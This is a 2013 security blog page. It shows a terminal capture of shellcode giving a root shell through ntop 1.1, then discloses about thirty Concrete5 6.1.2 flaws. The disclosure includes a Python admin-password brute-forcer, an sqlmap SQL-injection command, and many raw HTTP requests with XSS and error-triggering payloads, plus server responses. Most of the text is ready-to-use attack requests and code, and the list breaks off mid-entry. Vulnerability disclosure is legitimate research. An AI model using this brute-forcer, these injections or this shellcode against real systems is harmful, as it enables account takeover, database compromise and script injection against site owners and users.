Friday 16 August 2013

[EN] Friday... ;)


root@bt:~/src/ntop/ntop-1.1$ ./entop
SIOCGIFADDR error: 1Û¸·ªªª%·UUUSSÍ1Û¸ªªª%UUUSSÍë^1ÀFF
  V
° N
 ó
Í1ÛØ@ÍèÜÿÿÿ/bin/shàìÿ¿àìÿ¿/
errno=19
 ntop v.1.1 MT [i686-pc-linux-gnu] listening on ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P

 Host                     Act   -Rcvd-      Sent       TCP       UDP     ICMP sh-4.1# uid=0(root) gid=0(root) groups=0(root)
          sh-4.1#


(;

Monday 12 August 2013

[EN] Concrete5 6.1.2 Multiple Bugs

From SQL injection via multiple XSS to information gathering...
Enjoy:


Starting from description of bugs available for admin user logged-in I should mention
that there is no anti-bruteforce mechanizm, so if admins password is 'simple',
we can crack it, like it was described below:

Searching admin's password in Concrete5 CMS

Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py


#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys

username = 'admin'
path = '/index.php/login/do_login/'

print '\n_________________________________________________'
print '>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n'
print 'If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n'

pwdfile = open('passwords.txt','r')
read_pass = pwdfile.readlines()

for test_pass in read_pass:
  url = sys.argv[1]+path

  data = {
        'uName':username,
        'uPassword':test_pass,
        'rcID':'',
        'submit':'Sign+In+%3E',
  }

  get_cookies = requests.post(url)
  conn = requests.post(url, data=data, cookies=get_cookies.cookies)

  print '[ > ] Status code for this request: ', conn.status_code

  lines = conn.content

  if 'Currently' in lines:
    print '[+] Logged in as: [', username, '] with password: [', test_pass,']'



---< code >---

So if we will have an admin password, we can start from...

 1. SQL injection 
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223

-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"

8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"

11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"

14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"

AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"

'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"

8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"

<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"


-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"

Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"

170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"

0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"

1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
 

Because "_bf[BLOCK_" parameters are not properly filtered, we can use it to generate sql error, like this:


---< response >---

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">&lt; Back to Home</a></p>
</div>

---< response >---


To reproduce this vulnerability you can use sqlmap tool:

root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"

Example of SQL Injection



2.  DOM-based XSS
---< request >---

POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119

-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain

sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"

');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"

1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"


-----------------------------55721791519552--
---< request >---


---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---

3. sql error to check

---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


resp:

<h1>An unexpected error occurred.</h1>

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle  from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID)  inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID)  where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">&lt; Back to Home</a></p>
</div>




4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:


Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>

</div>
<div class="ccm-pane-footer">

9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html


Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134


11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94

MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---

16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187

ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---

resp:
       
    <div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
            mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
        </div>
       

       
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314

akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---

18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971

input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


resp:


<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />                       
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
                       
                       
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID=60&blockTypesIncluded%5B1%5D=A
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html


Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206


23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html


Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24

24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization

26. xss
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html


Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205


30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142

